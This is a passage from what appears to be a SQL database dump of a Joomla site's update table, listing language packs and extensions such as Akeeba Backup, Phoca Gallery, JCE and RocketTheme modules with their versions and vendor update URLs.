India','','pkg_ta-IN','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33011,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33012,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33013,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33014,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33015,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33016,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33017,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(33018,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.1.2','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-1-2			\n		',''),(33019,129,0,'JCE 2.9.28','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.28','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-28-released',''),(33020,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.0','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(33021,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(33022,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33023,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33024,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33025,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33026,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33027,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33028,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33029,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33030,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33031,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33032,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33033,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33034,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33035,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33036,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33037,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33038,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33039,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33040,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33041,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33042,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33043,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33044,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33045,3,0,'French','','pkg_fr-FR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33046,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33047,3,0,'German','','pkg_de-DE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33048,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33049,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33050,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33051,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33052,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33053,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33054,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33055,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33056,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33057,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33058,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33059,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33060,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33061,3,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33062,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33063,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33064,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33065,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33066,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33067,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33068,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33069,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33070,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33071,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33072,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33073,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33074,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33075,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33076,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33077,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33078,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33079,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33080,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(33081,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(33082,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(33083,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(33084,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(33085,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(33086,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(33087,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(33088,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(33089,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(33090,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(33091,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(33092,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33093,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33094,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33095,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33096,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33097,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(33098,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(33099,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(33100,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(33101,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(33102,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(33103,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(33104,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(33105,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(33106,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(33107,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(33108,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(33109,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(33110,57,0,'French','','pkg_fr-FR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(33111,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(33112,57,0,'German','','pkg_de-DE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(33113,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(33114,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(33115,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(33116,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(33117,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(33118,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(33119,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(33120,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(33121,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(33122,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33123,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(33124,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(33125,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.10.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33126,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(33127,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(33128,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(33129,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(33130,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(33131,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(33132,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(33133,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(33134,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(33135,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(33136,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(33137,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(33138,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(33139,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(33140,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(33141,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(33142,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(33143,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(33144,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(33145,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33146,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.1.2','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-1-2			\n		',''),(33147,129,0,'JCE 2.9.28','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.28','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-28-released',''),(33148,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.1.0','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(33149,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(33150,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33151,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33152,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33153,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33154,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33155,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33156,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33157,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33158,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33159,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33160,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33161,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33162,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33163,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33164,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33165,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33166,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33167,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33168,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33169,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33170,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33171,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33172,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33173,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33174,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33175,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33176,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33177,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33178,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33179,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33180,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33181,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33182,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33183,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33184,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33185,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33186,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33187,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33188,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33189,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33190,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33191,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33192,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33193,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33194,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33195,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33196,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33197,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33198,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33199,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33200,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33201,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33202,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33203,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33204,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33205,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33206,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33207,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33208,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33209,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33210,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33211,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33212,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33213,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-9.html',''),(33214,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33215,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(33216,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(33217,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(33218,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(33219,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(33220,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(33221,3,0,'Chinese, 